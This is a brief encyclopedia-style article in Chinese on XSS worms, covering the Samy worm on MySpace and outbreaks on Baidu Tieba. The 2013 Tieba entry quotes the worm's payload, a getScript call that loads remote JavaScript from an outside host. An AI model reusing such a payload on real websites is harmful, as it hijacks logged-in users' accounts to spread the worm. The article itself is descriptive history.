XSS蠕蟲
xss蠕蟲(cross site scripting worm)是一種跨站病毒,通常由腳本語言Javascript寫成,它藉由網站訪問者傳播
歷史
歷史第一個XSS蠕蟲是針對網站Myspace的Samy,它在20小時內感染了100萬個賬戶,作者Samy Kamkar之後被起訴
新浪微博
見對新浪微博的爭議#XSS.E6.BC.8F.E6.B4.9E
百度貼吧
2013年5月19日, 百度貼吧轉帖功能再度出現xss漏洞,大量貼吧內充斥接近滿版面, 包含代碼getScript('//xss.retaker.me/1.js')為標題的帖子,當已登陸用戶打開這樣的帖子,用戶所持賬戶便以相同方式在多個貼吧轉帖原作者的帖,部分網絡安全相關人士認為貼吧爆發了大規模XSS蠕蟲感染[1] [2] [3]
2014年3月9日, 百度貼吧轉帖功能再度出現xss漏洞
性質
參考
- ^ 百度贴吧XSS蠕虫大量爬行. [2013-05-19]. (原始內容存檔於2020-08-11).
- ^ 谷歌搜尋
- ^ 新浪微博, "xss贴吧". [2013-05-19]. (原始內容存檔於2019-02-07).